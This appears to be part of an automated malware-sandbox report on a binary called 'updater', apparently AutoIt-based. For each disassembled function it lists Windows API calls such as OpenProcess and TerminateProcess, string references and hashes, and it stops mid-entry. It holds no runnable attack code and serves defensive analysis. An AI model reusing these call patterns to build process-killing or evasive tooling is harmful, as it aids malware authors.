Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 2bda2da0797b6b5d5825993b33d79c3d7e7c0fd4a1275801870cb467dba38ed9
Instruction ID: 7c929f705aa5a118398670596544f4d4eedbbf4511c00707e54927324c208327
Opcode Fuzzy Hash: 2bda2da0797b6b5d5825993b33d79c3d7e7c0fd4a1275801870cb467dba38ed9
Instruction Fuzzy Hash: 44016CB09427597DE3008F5A8C85B56FFB8FF59354F00411BA15C47941C7F5A868CBE5

Function 00C159A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C159B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C159CA
GetWindowThreadProcessId.USER32(?,?), ref: 00C159D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C159E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C159F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C159F9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6e828076b12e572001b0553722edcd366c5dc16090ab384bb8e89aae557b3f13
Instruction ID: ae5171579b1fb10f76c9f6007125f8c7b984aea6f5f01fbe248851270c5075ca
Opcode Fuzzy Hash: 6e828076b12e572001b0553722edcd366c5dc16090ab384bb8e89aae557b3f13
Instruction Fuzzy Hash: CDF06D36280158BBE3215B929C0DFEF7E3CFBC7B21F100159FE0191050D7B01A1186B5

Function 017B2BB2 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 017AFFF9: GetKeyboardType.USER32(00000000), ref: 017AFFFE
Part of subcall function 017AFFF9: GetKeyboardType.USER32(00000001), ref: 017B000A

GetCommandLineA.KERNEL32 ref: 017B2C18
GetVersion.KERNEL32 ref: 017B2C2C
GetVersion.KERNEL32 ref: 017B2C3D
GetCurrentThreadId.KERNEL32 ref: 017B2C79

Part of subcall function 017B0029: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 017B004B
Part of subcall function 017B0029: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,017B009A,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 017B007E
Part of subcall function 017B0029: RegCloseKey.ADVAPI32(?,017B00A1,00000000,?,00000004,00000000,017B009A,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 017B0094

GetThreadLocale.KERNEL32 ref: 017B2C59

Part of subcall function 017B2AE9: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,017B2B4F), ref: 017B2B0F

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: c6a0f9e643073589fdbe7c9959b0788568915d9fe0beb7f0749452c382f7943c
Instruction ID: c7279bb373a29a45bf78fa3ad8b9811f48861f1b510e6f503238f330ac53a215
Opcode Fuzzy Hash: c6a0f9e643073589fdbe7c9959b0788568915d9fe0beb7f0749452c382f7943c
Instruction Fuzzy Hash: 990192A0805303CDD731BFF0F45A39ABA61AB61364F44852EA4554B35EEB395281C757

Function 00C177EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C177FE
EnterCriticalSection.KERNEL32(?,?,00BBC2B6,?,?), ref: 00C1780F
TerminateThread.KERNEL32(00000000,000001F6,?,00BBC2B6,?,?), ref: 00C1781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BBC2B6,?,?), ref: 00C17829

Part of subcall function 00C171F0: CloseHandle.KERNEL32(00000000,?,00C17836,?,00BBC2B6,?,?), ref: 00C171FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C1783C
LeaveCriticalSection.KERNEL32(?,?,00BBC2B6,?,?), ref: 00C17843

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: d5e3690709eb610095840b65e6e22a9dd7f9eacf380c8c295c800e1111a12b88
Instruction ID: c2e238906d8e74de38fe596e669fa1bfa0e5f711532ef73f62a9d96965f745a8
Opcode Fuzzy Hash: d5e3690709eb610095840b65e6e22a9dd7f9eacf380c8c295c800e1111a12b88
Instruction Fuzzy Hash: A8F05E3A595212ABE7212B64EC8CBEF7779FF46702B240921F203A50E1CBB55951DB60

Function 00C0954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C09555
UnloadUserProfile.USERENV(?,?), ref: 00C09561
CloseHandle.KERNEL32(?), ref: 00C0956A
CloseHandle.KERNEL32(?), ref: 00C09572
GetProcessHeap.KERNEL32(00000000,?), ref: 00C0957B
HeapFree.KERNEL32(00000000), ref: 00C09582

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 32d48ba49dd8e4e39764d64d7c2432c36f7f10de29972cfc13aa401adf182537
Instruction ID: 6e75d4e9195cf5a3fde9bcf8fc9c4f30667902126b1fb81a4328271af6cb98c4
Opcode Fuzzy Hash: 32d48ba49dd8e4e39764d64d7c2432c36f7f10de29972cfc13aa401adf182537
Instruction Fuzzy Hash: 82E0E53A084101BBDB011FE1EC0CB5EBF39FF4A722B204620F71581470CB32A460DB50

Function 00C28CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C28CFD
CharUpperBuffW.USER32(?,?), ref: 00C28E0C
VariantClear.OLEAUT32(?), ref: 00C28F84

Part of subcall function 00C17B1D: VariantInit.OLEAUT32(00000000), ref: 00C17B5D
Part of subcall function 00C17B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00C17B66
Part of subcall function 00C17B1D: VariantClear.OLEAUT32(00000000), ref: 00C17B72

Strings

Incorrect Parameter format, xrefs: 00C28D35, 00C28EF7
AUTOIT.ERROR, xrefs: 00C28E12

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: c2e3f575bd613124a99bdc917089a5fce0ba259339ace25735356339f9982015
Instruction ID: 38a3ce9abd8255c01d00873cfd3e5d3f631efff96302d90e08604373689fe0bd
Opcode Fuzzy Hash: c2e3f575bd613124a99bdc917089a5fce0ba259339ace25735356339f9982015
Instruction Fuzzy Hash: 53918C746043019FCB10DF24D48096ABBF5FF99714F14896EF89A8B7A2DB30E949CB52

Function 00C1323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC436A: _wcscpy.LIBCMT ref: 00BC438D

_memset.LIBCMT ref: 00C1332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C1335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C13410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C1343E

Strings

0, xrefs: 00C1331A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 00dec5fcd1c4e4d87c26870c1ffa638682ec0210a3d0cf9ec51aedfa3f4f5bb4
Instruction ID: bdf835288d0d1c2f585f62a12dae537029f708a4b71cd8ea8cea5a49f68b392c
Opcode Fuzzy Hash: 00dec5fcd1c4e4d87c26870c1ffa638682ec0210a3d0cf9ec51aedfa3f4f5bb4
Instruction Fuzzy Hash: 8351D4716083809BD715AA28D8457ABBBE4EF87318F044A2DF8A5D21E1DB30CB85E756

Function 00C12EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C12F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00C12FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C77890,00000000), ref: 00C13012

Strings

0, xrefs: 00C12F5C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: b73a958e13dd4d0636db5caa1daef1243d4a048ac5984a2b7ecd41ce6ce50ca4
Instruction ID: 5bdcb269cac8b9fc8a7ddc8695ddfd4ed4119c18719d068218f9348fb57f3d77
Opcode Fuzzy Hash: b73a958e13dd4d0636db5caa1daef1243d4a048ac5984a2b7ecd41ce6ce50ca4
Instruction Fuzzy Hash: 9341C3352083819FD720DF24C884B9ABBE4EF8A314F104A5EF5659B291D770EA45EB62

Function 00C09A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C0B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C09ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C09ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C09B0F

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

Strings

ComboBox, xrefs: 00C09A56
ListBox, xrefs: 00C09A8B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: b6c918d82e1bfbd86120ae74faa5363f1f58fbec2e423ad3dbe74e46d7715bef
Instruction ID: ff6b9bcafde1c2bb787f82e5eacc165a6005f06bba2730f750846f2ee720f689
Opcode Fuzzy Hash: b6c918d82e1bfbd86120ae74faa5363f1f58fbec2e423ad3dbe74e46d7715bef
Instruction Fuzzy Hash: 6B21E476A451047FDB24EBA8DC45EFFBBB8EF52360F104519F825A72E2DB344906D620

Function 00C36A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB214F
Part of subcall function 00BB2111: GetStockObject.GDI32(00000011), ref: 00BB2163
Part of subcall function 00BB2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C36A86
LoadLibraryW.KERNEL32(?), ref: 00C36A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C36AA2
DestroyWindow.USER32(?), ref: 00C36AAA

Strings

SysAnimate32, xrefs: 00C36A61

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: c8fc1fed6f1bac7ebbabec4839bab5828ad0c597cb0da8c66eb15d30c242c0b3
Instruction ID: 8d0072901c42814643d19076cf4422f77cfa7e21b6f20e06eb34f9e26e1c8c04
Opcode Fuzzy Hash: c8fc1fed6f1bac7ebbabec4839bab5828ad0c597cb0da8c66eb15d30c242c0b3
Instruction Fuzzy Hash: FB215B75224205BFEF108F64DC81FBB77A9EB59364F20C629FA61A3190D3719C51A7A0

Function 00C17357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C17377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C173AA
GetStdHandle.KERNEL32(0000000C), ref: 00C173BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C173F6

Strings

nul, xrefs: 00C173F1

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 693a88e44e39dd12dfc841607ccdfcca7e5b684fbe183a08086756f97c352009
Instruction ID: 0c91b070c9990ffff7099cdff6d50dfc0382e2391c16ab6582e1195b95edbed1
Opcode Fuzzy Hash: 693a88e44e39dd12dfc841607ccdfcca7e5b684fbe183a08086756f97c352009
Instruction Fuzzy Hash: 83217F74508206ABDB208F69DC45ADE7BB4AF46720F604B19FDB0D72E0D770D990EB60

Function 00C17425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C17444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C17476
GetStdHandle.KERNEL32(000000F6), ref: 00C17487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C174C1

Strings

nul, xrefs: 00C174BC

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f0a8cacd9bf7df2a0647d8f3163991b7cc4d35d655c2cc25f09494f564cbb4e5
Instruction ID: 3ad873365afea119b0cb1e0b806d2ec4d7313941243fe133f19c4f797ccdb1c8
Opcode Fuzzy Hash: f0a8cacd9bf7df2a0647d8f3163991b7cc4d35d655c2cc25f09494f564cbb4e5
Instruction Fuzzy Hash: 842190356082069BDB209F699C44BDA7BB8AF56730F200B19F9B1E72D0DB709991EB50

Function 00C1B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C1B2EB
__swprintf.LIBCMT ref: 00C1B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00C40980), ref: 00C1B342

Strings

%lu, xrefs: 00C1B2FE

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: e1bcdbed96fd55f3b1b58df01d35cd8346cfacf492f84d61cc9992ad5f123406
Instruction ID: 164272b488baf578f3d81996bdaa6ae1e31480914436cb4d2c679929cb17d0d7
Opcode Fuzzy Hash: e1bcdbed96fd55f3b1b58df01d35cd8346cfacf492f84d61cc9992ad5f123406
Instruction Fuzzy Hash: C0215E35A00108AFCB10DF65C885EAEB7F8FF4A704B1040A9F909E7292DB71EE45DB61

Function 00C0AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

Part of subcall function 00C0AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C0AA6F
Part of subcall function 00C0AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0AA82
Part of subcall function 00C0AA52: GetCurrentThreadId.KERNEL32 ref: 00C0AA89
Part of subcall function 00C0AA52: AttachThreadInput.USER32(00000000), ref: 00C0AA90

GetFocus.USER32 ref: 00C0AC2A

Part of subcall function 00C0AA9B: GetParent.USER32(?), ref: 00C0AAA9

GetClassNameW.USER32(?,?,00000100), ref: 00C0AC73
EnumChildWindows.USER32(?,00C0ACEB), ref: 00C0AC9B
__swprintf.LIBCMT ref: 00C0ACB5

Strings

%s%d, xrefs: 00C0ACAF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: a97fb2407aa6e450ea10c398c20d1290160a15a681ba2fcda3ff7aa425768c18
Instruction ID: 132db4205bdfbdb8a02aac1ecb78cd2d9ecf34205529182238284f5e843bc73a
Opcode Fuzzy Hash: a97fb2407aa6e450ea10c398c20d1290160a15a681ba2fcda3ff7aa425768c18
Instruction Fuzzy Hash: 1F11E175640304ABDF11BFA0CD85FEA37ACAB45700F1040B9FE08AA1C3DA715945EB72

Function 017B0029 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 017B004B
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,017B009A,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 017B007E
RegCloseKey.ADVAPI32(?,017B00A1,00000000,?,00000004,00000000,017B009A,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 017B0094

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 017B0041
FPUMaskValue, xrefs: 017B0075

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 6815f73d7734af5e5ca3c132f696b5a266c5751a76abb6ddbc4fd00c4323e54d
Instruction ID: 020e8be697cdb5f17e586c25ebac677b93dfeec3fd7067349953a9fe04a6174a
Opcode Fuzzy Hash: 6815f73d7734af5e5ca3c132f696b5a266c5751a76abb6ddbc4fd00c4323e54d
Instruction Fuzzy Hash: F101B579A4030DBEDB21DBE1CC51FEAB3BCD744712F5001A5B910E3588E7755550D754

Function 00C122E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C12318

Strings

EXISTS, xrefs: 00C12340
KEYS, xrefs: 00C1232F
APPEND, xrefs: 00C12351
REMOVE, xrefs: 00C1231E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 23f0b9ea2e4d3b190345a0be49773a0901301be37769c7299e973615aaf62236
Instruction ID: 4e3bc2c6bfaf0a4fb203132a9a1ca699f488063f1701563e6c8be6d28fd9cd8b
Opcode Fuzzy Hash: 23f0b9ea2e4d3b190345a0be49773a0901301be37769c7299e973615aaf62236
Instruction Fuzzy Hash: C4117C749101189FCF00EF94C8909EEB3B8FF27304F5084AAE820A7262EB325E56DB40

Function 00C2F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

